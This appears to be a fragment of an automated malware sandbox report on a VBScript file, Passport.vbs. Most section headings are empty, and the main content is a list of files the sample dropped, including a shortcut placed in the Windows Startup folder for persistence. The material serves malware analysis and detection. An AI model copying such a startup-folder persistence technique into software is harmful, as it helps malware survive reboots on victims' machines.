Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\country[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\org[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\country[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\org[1].htm

C:\Users\user\AppData\Local\Temp\Passport.vbs

C:\Users\user\AppData\Local\Temp\Passport.vbs:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
Passport.vbs